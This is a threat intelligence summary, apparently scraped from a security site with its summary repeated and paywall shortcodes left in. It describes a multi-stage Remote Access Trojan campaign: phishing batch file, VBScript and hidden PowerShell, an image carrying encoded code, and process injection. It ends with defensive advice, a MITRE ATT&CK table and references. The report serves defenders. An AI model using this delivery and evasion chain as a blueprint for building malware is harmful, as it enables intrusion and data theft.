EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated cybercrime group that operates primarily from Eastern Europe. The threat takes the form of a Remote Access Trojan designed to gain persistent control over victim machines. Recent activity shows the actors targeting mid‐size enterprises in the manufacturing, logistics, and professional services sectors across Europe and North America. The primary objective is to harvest credentials, exfiltrate proprietary data, and optionally enable ransom negotiations by holding critical systems hostage.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The campaign is attributed to a financially motivated cybercrime group that operates primarily from Eastern Europe. The threat takes the form of a Remote Access Trojan designed to gain persistent control over victim machines. Recent activity shows the actors targeting mid‐size enterprises in the manufacturing, logistics, and professional services sectors across Europe and North America. The primary objective is to harvest credentials, exfiltrate proprietary data, and optionally enable ransom negotiations by holding critical systems hostage.[emaillocker id="1283"]
They also seek to establish footholds for future intrusion campaigns. The intrusion begins with a phishing email that carries a seemingly innocuous batch file. When executed, the file launches the Windows Script Host component, which in turn runs a VBScript that decodes a Base64 payload and passes it to PowerShell. The PowerShell command runs hidden, modifies the module search path, and retrieves a compressed archive from a cloud storage provider.
Inside the archive, a script interpreter extracts additional payloads, including a malicious image that actually contains encoded code. That code generates in‐memory shellcode, injects it into a legitimate system utility, and finally installs the RAT, establishing a command‐and‐control channel. The multi‐stage approach makes the threat difficult to spot because each step blends with normal administrative behavior, using trusted binaries and encrypted archives that evade static inspection. In‐memory reconstruction and process injection leave few forensic artifacts, complicating incident response and prolonging dwell time. Organisations should harden email gateways, enforce strict execution policies for script hosts, and monitor for anomalous use of legitimate utilities such as color management or compression tools. Regular backup verification, network segmentation, and deployment of endpoint detection that can flag unusual command‐line patterns are essential to mitigate impact.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.005 | Command and Scripting Interpreter | Visual Basic |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Defense Evasion | T1036 | Masquerading | — |
| Privilege Escalation | T1055 | Process Injection | — |
| Defense Evasion | T1564.001 | Hide Artifacts | Hidden Files and Directories |
| Command and Control | T1105 | Ingress Tool Transfer | — |
REFERENCES:
reports contain further technical details:
https://securityonline.info/new-remcos-rat-variant-donutloader/
https://blog.gdatasoftware.com/2026/05/38426-donutloader-remcos-rat